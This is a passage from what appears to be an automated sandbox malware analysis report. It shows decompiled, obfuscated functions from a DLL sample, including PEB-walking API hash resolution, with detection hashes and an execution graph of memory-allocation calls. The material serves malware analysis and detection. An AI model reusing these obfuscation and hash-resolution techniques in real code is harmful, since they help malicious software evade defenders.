                                                                                                                                                                            				_v12 = _v12 ^ 0xa86b283b;
                                                                                                                                                                            				_v8 = 0xf205aa;
                                                                                                                                                                            				_v8 = _v8 ^ 0x840ccd49;
                                                                                                                                                                            				_v8 = _v8 + 0x2990;
                                                                                                                                                                            				_v8 = _v8 >> 0xc;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0003f43b;
                                                                                                                                                                            				_v28 = 0xeebda;
                                                                                                                                                                            				_v28 = _v28 + 0xdccc;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00000347;
                                                                                                                                                                            				_v24 = 0xa36d5e;
                                                                                                                                                                            				_v24 = _v24 | 0xd0b00948;
                                                                                                                                                                            				_v24 = _v24 ^ 0xd0bd6ebb;
                                                                                                                                                                            				_t81 =  *((intOrPtr*)(E02F5F7F7() + 0xc)) + 0xc;
                                                                                                                                                                            				_t82 =  *_t81;
                                                                                                                                                                            				while(_t82 != _t81) {
                                                                                                                                                                            					_t66 = E02F5EFE1(_v8, _v28, _v24,  *((intOrPtr*)(_t82 + 0x30)));
                                                                                                                                                                            					_t83 = _t83 + 0xc;
                                                                                                                                                                            					if((_t66 ^ 0x2d567c83) == _t70) {
                                                                                                                                                                            						return  *((intOrPtr*)(_t82 + 0x18));
                                                                                                                                                                            					}
                                                                                                                                                                            					_t82 =  *_t82;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x02f65681
                                                                                                                                                                            0x02f65688
                                                                                                                                                                            0x02f65695
                                                                                                                                                                            0x02f6569b
                                                                                                                                                                            0x02f656a0
                                                                                                                                                                            0x02f656a5
                                                                                                                                                                            0x02f656ac
                                                                                                                                                                            0x02f656b3
                                                                                                                                                                            0x02f656ba
                                                                                                                                                                            0x02f656c1
                                                                                                                                                                            0x02f656c8
                                                                                                                                                                            0x02f656d2
                                                                                                                                                                            0x02f656d5
                                                                                                                                                                            0x02f656dc
                                                                                                                                                                            0x02f656df
                                                                                                                                                                            0x02f656e6
                                                                                                                                                                            0x02f656ed
                                                                                                                                                                            0x02f656f4
                                                                                                                                                                            0x02f656fb
                                                                                                                                                                            0x02f656ff
                                                                                                                                                                            0x02f65706
                                                                                                                                                                            0x02f6570d
                                                                                                                                                                            0x02f65714
                                                                                                                                                                            0x02f6571b
                                                                                                                                                                            0x02f65722
                                                                                                                                                                            0x02f65729
                                                                                                                                                                            0x02f6573e
                                                                                                                                                                            0x02f65741
                                                                                                                                                                            0x02f65767
                                                                                                                                                                            0x02f65754
                                                                                                                                                                            0x02f6575e
                                                                                                                                                                            0x02f65763
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f65774
                                                                                                                                                                            0x02f65765
                                                                                                                                                                            0x02f65765
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
                                                                                                                                                                            • Instruction ID: ed140ed543c017fcf4d1a264f64587567670dbb22aefd4932dc132365e13d97a
                                                                                                                                                                            • Opcode Fuzzy Hash: f55cd74c2952393ab5aca3dee7201afe3819bdbfddab02328eb5f9b09f94cb42
                                                                                                                                                                            • Instruction Fuzzy Hash: 3431F572E0020DEBDB58DFA5D98A8AEFBB2FB40314F248099D615BB210D3B45B559F81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E02F60EBC(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				unsigned int _v20;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				intOrPtr* _t51;
                                                                                                                                                                            
                                                                                                                                                                            				E02F6FE29(_t44);
                                                                                                                                                                            				_v20 = 0x5f9276;
                                                                                                                                                                            				_v20 = _v20 >> 6;
                                                                                                                                                                            				_v20 = _v20 >> 0xa;
                                                                                                                                                                            				_v20 = _v20 ^ 0x0000ae6f;
                                                                                                                                                                            				_v16 = 0x7df0fb;
                                                                                                                                                                            				_v16 = _v16 >> 0xb;
                                                                                                                                                                            				_v16 = _v16 ^ 0x9952d77b;
                                                                                                                                                                            				_v16 = _v16 ^ 0x9951c792;
                                                                                                                                                                            				_v12 = 0xf93209;
                                                                                                                                                                            				_v12 = _v12 | 0xf37a8f1a;
                                                                                                                                                                            				_v12 = _v12 + 0xffff09ac;
                                                                                                                                                                            				_v12 = _v12 + 0xa761;
                                                                                                                                                                            				_v12 = _v12 ^ 0xf3f42664;
                                                                                                                                                                            				_v8 = 0x4c6886;
                                                                                                                                                                            				_v8 = _v8 ^ 0x2aaf40fd;
                                                                                                                                                                            				_v8 = _v8 * 0x7c;
                                                                                                                                                                            				_v8 = _v8 >> 5;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0632021c;
                                                                                                                                                                            				_t51 = E02F5EB52(__ecx, __ecx, 0xc0c22a7, 0x4d, 0xa2289af1);
                                                                                                                                                                            				return  *_t51(0, 0, _a32, _a28, 0, 0, __ecx, 0, _a4, 0, _a12, _a16, 0, 0, _a28, _a32);
                                                                                                                                                                            			}









                                                                                                                                                                            0x02f60ed9
                                                                                                                                                                            0x02f60ede
                                                                                                                                                                            0x02f60ee8
                                                                                                                                                                            0x02f60eec
                                                                                                                                                                            0x02f60ef0
                                                                                                                                                                            0x02f60ef7
                                                                                                                                                                            0x02f60efe
                                                                                                                                                                            0x02f60f02
                                                                                                                                                                            0x02f60f09
                                                                                                                                                                            0x02f60f10
                                                                                                                                                                            0x02f60f17
                                                                                                                                                                            0x02f60f1e
                                                                                                                                                                            0x02f60f25
                                                                                                                                                                            0x02f60f2c
                                                                                                                                                                            0x02f60f33
                                                                                                                                                                            0x02f60f3a
                                                                                                                                                                            0x02f60f52
                                                                                                                                                                            0x02f60f55
                                                                                                                                                                            0x02f60f59
                                                                                                                                                                            0x02f60f6d
                                                                                                                                                                            0x02f60f85

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
                                                                                                                                                                            • Instruction ID: ae3eb6d158c58c52f5a41cf9071ab1b13c783044e370b59a6881d355d8b06271
                                                                                                                                                                            • Opcode Fuzzy Hash: 28b9a31d6d310fd66289eca8aff00d608e2121ecbf4137da26fc55f628ae5085
                                                                                                                                                                            • Instruction Fuzzy Hash: ED210E71801219FBCF18DFA1CD4A8DEBFB4FF18354F108688A958A2220D3798A14DF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F5EF0C(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                            
                                                                                                                                                                            				_v28 = 4;
                                                                                                                                                                            				_v24 = 0xd6e1b5;
                                                                                                                                                                            				_v24 = _v24 | 0x5e4e7cd1;
                                                                                                                                                                            				_v24 = _v24 >> 0x10;
                                                                                                                                                                            				_v24 = _v24 ^ 0x20005ede;
                                                                                                                                                                            				_v12 = 0x35fbf9;
                                                                                                                                                                            				_v12 = _v12 << 2;
                                                                                                                                                                            				_v12 = _v12 + 0xffffd421;
                                                                                                                                                                            				_v12 = _v12 >> 5;
                                                                                                                                                                            				_v12 = _v12 ^ 0x000779ff;
                                                                                                                                                                            				_v8 = 0xb66603;
                                                                                                                                                                            				_v8 = _v8 | 0x4ba1ba6b;
                                                                                                                                                                            				_v8 = _v8 ^ 0x6df4d1b9;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1286fe83;
                                                                                                                                                                            				_v8 = _v8 ^ 0x34cd5dfe;
                                                                                                                                                                            				_v20 = 0x1bb0b6;
                                                                                                                                                                            				_v20 = _v20 | 0x21937f20;
                                                                                                                                                                            				_v20 = _v20 << 4;
                                                                                                                                                                            				_v20 = _v20 ^ 0x19bd1c5b;
                                                                                                                                                                            				_v16 = 0xd95204;
                                                                                                                                                                            				_v16 = _v16 ^ 0x6876e9a1;
                                                                                                                                                                            				_t67 = 0x62;
                                                                                                                                                                            				_v16 = _v16 / _t67;
                                                                                                                                                                            				_v16 = _v16 ^ 0x01180520;
                                                                                                                                                                            				_t57 = E02F660B8(_v12, _v24 | __edx, _v8,  &_v28,  &_v32, __ecx, __ecx, _v20, _v16);
                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                            				return  ~_t57 & _v32;
                                                                                                                                                                            			}












                                                                                                                                                                            0x02f5ef12
                                                                                                                                                                            0x02f5ef19
                                                                                                                                                                            0x02f5ef20
                                                                                                                                                                            0x02f5ef27
                                                                                                                                                                            0x02f5ef2b
                                                                                                                                                                            0x02f5ef32
                                                                                                                                                                            0x02f5ef39
                                                                                                                                                                            0x02f5ef3d
                                                                                                                                                                            0x02f5ef44
                                                                                                                                                                            0x02f5ef48
                                                                                                                                                                            0x02f5ef4f
                                                                                                                                                                            0x02f5ef56
                                                                                                                                                                            0x02f5ef5d
                                                                                                                                                                            0x02f5ef64
                                                                                                                                                                            0x02f5ef6b
                                                                                                                                                                            0x02f5ef72
                                                                                                                                                                            0x02f5ef79
                                                                                                                                                                            0x02f5ef80
                                                                                                                                                                            0x02f5ef84
                                                                                                                                                                            0x02f5ef8d
                                                                                                                                                                            0x02f5ef96
                                                                                                                                                                            0x02f5efa4
                                                                                                                                                                            0x02f5efa7
                                                                                                                                                                            0x02f5efad
                                                                                                                                                                            0x02f5efcc
                                                                                                                                                                            0x02f5efd6
                                                                                                                                                                            0x02f5efe0

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
                                                                                                                                                                            • Instruction ID: 40f7055687cd360b2080f06c09f2b398e1c32df91588374f82e2570c16a91051
                                                                                                                                                                            • Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
                                                                                                                                                                            • Instruction Fuzzy Hash: 3821E372C0120DABDB09DFE5CA4A5EFFBB5EB44204F608299D512B6220D3B54B059FA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E02F5C5D8(intOrPtr _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                            
                                                                                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                                                                                            				_v36 = 0xa0afa0;
                                                                                                                                                                            				_v28 = 0x9adc8d;
                                                                                                                                                                            				_v28 = _v28 ^ 0x90925320;
                                                                                                                                                                            				_v28 = _v28 ^ 0x90088fa5;
                                                                                                                                                                            				_v24 = 0x1cb3a6;
                                                                                                                                                                            				_v24 = _v24 << 0x10;
                                                                                                                                                                            				_v24 = _v24 ^ 0xb3a3d0bd;
                                                                                                                                                                            				_v8 = 0xc8bfd2;
                                                                                                                                                                            				_v8 = _v8 >> 6;
                                                                                                                                                                            				_v8 = _v8 + 0x77b2;
                                                                                                                                                                            				_t69 = 0x16;
                                                                                                                                                                            				_v8 = _v8 / _t69;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0000123c;
                                                                                                                                                                            				_v20 = 0x3ff815;
                                                                                                                                                                            				_v20 = _v20 | 0x9e661a12;
                                                                                                                                                                            				_v20 = _v20 + 0x3006;
                                                                                                                                                                            				_v20 = _v20 ^ 0x9e825c55;
                                                                                                                                                                            				_v12 = 0xda9b76;
                                                                                                                                                                            				_t70 = 0x6b;
                                                                                                                                                                            				_v12 = _v12 / _t70;
                                                                                                                                                                            				_v12 = _v12 | 0xed94e7c2;
                                                                                                                                                                            				_v12 = _v12 + 0xffffd684;
                                                                                                                                                                            				_v12 = _v12 ^ 0xed94606e;
                                                                                                                                                                            				_v16 = 0x191c50;
                                                                                                                                                                            				_v16 = _v16 >> 0xa;
                                                                                                                                                                            				_v16 = _v16 >> 7;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00013f6e;
                                                                                                                                                                            				return E02F6648A(_a4, _v20, _v12, _v16, E02F728EB(), _v28);
                                                                                                                                                                            			}













                                                                                                                                                                            0x02f5c5de
                                                                                                                                                                            0x02f5c5e4
                                                                                                                                                                            0x02f5c5eb
                                                                                                                                                                            0x02f5c5f2
                                                                                                                                                                            0x02f5c5f9
                                                                                                                                                                            0x02f5c600
                                                                                                                                                                            0x02f5c607
                                                                                                                                                                            0x02f5c60b
                                                                                                                                                                            0x02f5c612
                                                                                                                                                                            0x02f5c619
                                                                                                                                                                            0x02f5c61d
                                                                                                                                                                            0x02f5c629
                                                                                                                                                                            0x02f5c62e
                                                                                                                                                                            0x02f5c633
                                                                                                                                                                            0x02f5c63a
                                                                                                                                                                            0x02f5c641
                                                                                                                                                                            0x02f5c648
                                                                                                                                                                            0x02f5c64f
                                                                                                                                                                            0x02f5c656
                                                                                                                                                                            0x02f5c660
                                                                                                                                                                            0x02f5c663
                                                                                                                                                                            0x02f5c666
                                                                                                                                                                            0x02f5c66d
                                                                                                                                                                            0x02f5c674
                                                                                                                                                                            0x02f5c67b
                                                                                                                                                                            0x02f5c682
                                                                                                                                                                            0x02f5c686
                                                                                                                                                                            0x02f5c68a
                                                                                                                                                                            0x02f5c6b7

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
                                                                                                                                                                            • Instruction ID: 85d9e051a8b6febbe7ac3f2345d8225ac78b8754b96534a3cd1bdeddd2b7c27c
                                                                                                                                                                            • Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
                                                                                                                                                                            • Instruction Fuzzy Hash: EC212DB1C0020DEBDB08CFE0C98A4EEBBB2BB14318F208089D525B6260D3B94B54CF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E02F5F7F7() {
                                                                                                                                                                            
                                                                                                                                                                            				return  *[fs:0x30];
                                                                                                                                                                            			}



                                                                                                                                                                            0x02f5f7fd

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:5.3%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:13.3%
                                                                                                                                                                            Signature Coverage:9.7%
                                                                                                                                                                            Total number of Nodes:361
                                                                                                                                                                            Total number of Limit Nodes:22

                                                                                                                                                                            Graph

                                                                                                                                                                            execution_graph 21311 10017b85 21312 10017b91 21311->21312 21313 10017b8c 21311->21313 21317 10017a8f 21312->21317 21329 1001f914 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21313->21329 21316 10017ba2 21319 10017a9b __msize 21317->21319 21318 10017ae8 21326 10017b38 __msize 21318->21326 21385 100088e0 21318->21385 21319->21318 21319->21326 21330 100178b6 21319->21330 21323 10017b18 21324 100178b6 __CRT_INIT@12 163 API calls 21323->21324 21323->21326 21324->21326 21325 100088e0 ___DllMainCRTStartup 143 API calls 21327 10017b0f 21325->21327 21326->21316 21328 100178b6 __CRT_INIT@12 163 API calls 21327->21328 21328->21323 21329->21312 21331 100179e0 21330->21331 21332 100178c9 GetProcessHeap HeapAlloc 21330->21332 21333 100179e6 21331->21333 21334 10017a1b 21331->21334 21335 100178ed GetVersionExA 21332->21335 21348 100178e6 21332->21348 21342 10017a05 21333->21342 21333->21348 21498 10018033 67 API calls _doexit 21333->21498 21336 10017a20 21334->21336 21337 10017a79 21334->21337 21338 10017908 GetProcessHeap HeapFree 21335->21338 21339 100178fd GetProcessHeap HeapFree 21335->21339 21501 1001bddb 6 API calls __decode_pointer 21336->21501 21337->21348 21523 1001c0b2 79 API calls 2 library calls 21337->21523 21341 10017934 21338->21341 21339->21348 21405 1001a305 HeapCreate 21341->21405 21342->21348 21499 1001f295 68 API calls __ioterm 21342->21499 21343 10017a25 21502 1001e76e 21343->21502 21348->21318 21349 1001796a 21349->21348 21415 1001c11b GetModuleHandleA 21349->21415 21352 10017a0f 21500 1001be05 5 API calls __decode_pointer 21352->21500 21353 10017a3d 21508 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21353->21508 21357 10017978 __RTC_Initialize 21362 1001798b GetCommandLineA 21357->21362 21376 1001797c 21357->21376 21359 10017a4f 21363 10017a56 21359->21363 21364 10017a6d 21359->21364 21448 1001f60d 21362->21448 21509 1001be42 67 API calls 4 library calls 21363->21509 21510 10016380 21364->21510 21370 10017a5d GetCurrentThreadId 21370->21348 21371 100179a5 21372 100179b0 21371->21372 21373 100179a9 21371->21373 21494 1001f554 111 API calls 3 library calls 21372->21494 21493 1001be05 5 API calls __decode_pointer 21373->21493 21492 1001a35f VirtualFree HeapFree HeapFree HeapDestroy 21376->21492 21377 100179b5 21378 100179c9 21377->21378 21495 1001f2e1 110 API calls 6 library calls 21377->21495 21384 100179ce 21378->21384 21497 1001f295 68 API calls __ioterm 21378->21497 21381 100179de 21381->21373 21382 100179be 21382->21378 21496 10017ec2 75 API calls 4 library calls 21382->21496 21384->21348 21574 10008860 21385->21574 21388 10008966 21604 1001771b 105 API calls 9 library calls 21388->21604 21390 10008970 21390->21323 21390->21325 21391 10008932 ___DllMainCRTStartup 21392 10008a00 ___DllMainCRTStartup 21391->21392 21393 10008a36 ___DllMainCRTStartup 21391->21393 21394 10008a1a VirtualAllocExNuma 21392->21394 21395 10008a4e VirtualAlloc 21393->21395 21396 10008a66 21394->21396 21395->21396 21397 10016a10 ___crtGetEnvironmentStringsA __VEC_memcpy 21396->21397 21398 10008a78 21397->21398 21579 1001703b 21398->21579 21400 10008a87 21598 10002fa0 21400->21598 21402 10008a9d ___DllMainCRTStartup 21601 10002d20 21402->21601 21406 1001a325 21405->21406 21407 1001a328 21405->21407 21406->21349 21524 1001a2aa 67 API calls 3 library calls 21407->21524 21409 1001a32d 21410 1001a337 21409->21410 21411 1001a35b 21409->21411 21525 1001a57a HeapAlloc 21410->21525 21411->21349 21413 1001a341 21413->21411 21414 1001a346 HeapDestroy 21413->21414 21414->21406 21416 1001c136 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21415->21416 21417 1001c12d 21415->21417 21419 1001c180 TlsAlloc 21416->21419 21526 1001be05 5 API calls __decode_pointer 21417->21526 21422 1001c29a 21419->21422 21423 1001c1ce TlsSetValue 21419->21423 21422->21357 21423->21422 21424 1001c1df 21423->21424 21527 10018042 5 API calls 2 library calls 21424->21527 21426 1001c1e4 21528 1001bd03 TlsGetValue 21426->21528 21429 1001bd03 __encode_pointer 5 API calls 21430 1001c1ff 21429->21430 21431 1001bd03 __encode_pointer 5 API calls 21430->21431 21432 1001c20f 21431->21432 21433 1001bd03 __encode_pointer 5 API calls 21432->21433 21434 1001c21f 21433->21434 21537 1001a3d3 67 API calls ___crtInitCritSecAndSpinCount 21434->21537 21436 1001c22c 21437 1001c295 21436->21437 21538 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21436->21538 21541 1001be05 5 API calls __decode_pointer 21437->21541 21440 1001c240 21440->21437 21441 1001e76e __calloc_crt 67 API calls 21440->21441 21442 1001c259 21441->21442 21442->21437 21539 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 21442->21539 21444 1001c273 21444->21437 21445 1001c27a 21444->21445 21540 1001be42 67 API calls 4 library calls 21445->21540 21447 1001c282 GetCurrentThreadId 21447->21422 21449 1001f648 21448->21449 21450 1001f629 GetEnvironmentStringsW 21448->21450 21451 1001f631 21449->21451 21453 1001f6e3 21449->21453 21450->21451 21452 1001f63d GetLastError 21450->21452 21455 1001f663 GetEnvironmentStringsW 21451->21455 21459 1001f672 WideCharToMultiByte 21451->21459 21452->21449 21454 1001f6eb GetEnvironmentStrings 21453->21454 21462 1001799b 21453->21462 21457 1001f6fb 21454->21457 21454->21462 21455->21459 21455->21462 21543 1001e72e 67 API calls _malloc 21457->21543 21460 1001f6a6 21459->21460 21461 1001f6d8 FreeEnvironmentStringsW 21459->21461 21542 1001e72e 67 API calls _malloc 21460->21542 21461->21462 21475 1001f055 21462->21475 21465 1001f714 21467 1001f727 21465->21467 21468 1001f71b FreeEnvironmentStringsA 21465->21468 21466 1001f6ac 21466->21461 21469 1001f6b5 WideCharToMultiByte 21466->21469 21544 10016a10 21467->21544 21468->21462 21471 1001f6cf 21469->21471 21472 1001f6c6 21469->21472 21471->21461 21474 10016380 __ioterm 67 API calls 21472->21474 21474->21471 21548 1001984c 21475->21548 21477 1001f061 GetStartupInfoA 21478 1001e76e __calloc_crt 67 API calls 21477->21478 21486 1001f082 21478->21486 21479 1001f28c __msize 21479->21371 21480 1001f209 GetStdHandle 21485 1001f1d3 21480->21485 21481 1001e76e __calloc_crt 67 API calls 21481->21486 21482 1001f26e SetHandleCount 21482->21479 21483 1001f21b GetFileType 21483->21485 21484 1001f156 21484->21485 21487 1001f18a 21484->21487 21488 1001f17f GetFileType 21484->21488 21485->21480 21485->21482 21485->21483 21491 1001f232 21485->21491 21486->21479 21486->21481 21486->21484 21486->21485 21487->21479 21487->21484 21549 1001febd 67 API calls 5 library calls 21487->21549 21488->21484 21488->21487 21491->21479 21491->21485 21550 1001febd 67 API calls 5 library calls 21491->21550 21492->21348 21494->21377 21495->21382 21496->21378 21497->21381 21498->21342 21499->21352 21501->21343 21505 1001e772 21502->21505 21504 10017a31 21504->21348 21504->21353 21505->21504 21506 1001e792 Sleep 21505->21506 21551 100170fe 21505->21551 21507 1001e7a7 21506->21507 21507->21504 21507->21505 21508->21359 21509->21370 21511 1001638c __msize 21510->21511 21512 100163cb 21511->21512 21518 10016405 __dosmaperr __msize 21511->21518 21570 1001a549 67 API calls 2 library calls 21511->21570 21513 100163e0 RtlFreeHeap 21512->21513 21512->21518 21515 100163f2 21513->21515 21513->21518 21573 10017d62 67 API calls __getptd_noexit 21515->21573 21517 100163f7 GetLastError 21517->21518 21518->21384 21519 100163a3 ___sbh_find_block 21520 100163bd 21519->21520 21571 1001a5ed VirtualFree VirtualFree HeapFree ___sbh_free_block 21519->21571 21572 100163d6 LeaveCriticalSection _doexit 21520->21572 21523->21348 21524->21409 21525->21413 21527->21426 21529 1001bd37 GetModuleHandleA 21528->21529 21530 1001bd16 21528->21530 21532 1001bd60 21529->21532 21533 1001bd46 GetProcAddress 21529->21533 21530->21529 21531 1001bd20 TlsGetValue 21530->21531 21536 1001bd2b 21531->21536 21532->21429 21534 1001bd2f 21533->21534 21534->21532 21535 1001bd56 RtlEncodePointer 21534->21535 21535->21532 21536->21529 21536->21534 21537->21436 21538->21440 21539->21444 21540->21447 21542->21466 21543->21465 21545 10016a28 21544->21545 21546 10016a4f __VEC_memcpy 21545->21546 21547 10016a57 FreeEnvironmentStringsA 21545->21547 21546->21547 21547->21462 21548->21477 21549->21487 21550->21491 21552 1001710a __msize 21551->21552 21553 10017122 21552->21553 21563 10017141 _memset 21552->21563 21564 10017d62 67 API calls __getptd_noexit 21553->21564 21555 10017127 21565 1001c596 4 API calls 2 library calls 21555->21565 21557 100171b3 RtlAllocateHeap 21557->21563 21560 10017137 __msize 21560->21505 21563->21557 21563->21560 21566 1001a549 67 API calls 2 library calls 21563->21566 21567 1001ad96 5 API calls 2 library calls 21563->21567 21568 100171fa LeaveCriticalSection _doexit 21563->21568 21569 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 21563->21569 21564->21555 21566->21563 21567->21563 21568->21563 21569->21563 21570->21519 21571->21520 21572->21512 21573->21517 21575 1001703b _malloc 67 API calls 21574->21575 21576 10008870 21575->21576 21577 10016380 __ioterm 67 API calls 21576->21577 21578 1000887c 21576->21578 21577->21578 21578->21388 21578->21391 21580 10017049 21579->21580 21581 100170e8 21579->21581 21584 1001705e 21580->21584 21590 100170ac RtlAllocateHeap 21580->21590 21592 100170df 21580->21592 21593 100170d3 21580->21593 21596 100170d1 21580->21596 21608 10016fec 67 API calls 4 library calls 21580->21608 21609 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 21580->21609 21612 1001e520 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 21581->21612 21583 100170ee 21613 10017d62 67 API calls __getptd_noexit 21583->21613 21584->21580 21605 1001e4dd 67 API calls 2 library calls 21584->21605 21606 1001e33d 67 API calls 7 library calls 21584->21606 21607 10017df0 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 21584->21607 21587 100170f4 21587->21400 21590->21580 21592->21400 21610 10017d62 67 API calls __getptd_noexit 21593->21610 21611 10017d62 67 API calls __getptd_noexit 21596->21611 21599 1001703b _malloc 67 API calls 21598->21599 21600 10002fc0 21599->21600 21600->21402 21614 10002900 21601->21614 21604->21390 21605->21584 21606->21584 21608->21580 21609->21580 21610->21596 21611->21592 21612->21583 21613->21587 21651 10001fe0 21614->21651 21617 10002943 SetLastError 21648 10002929 ShowWindow 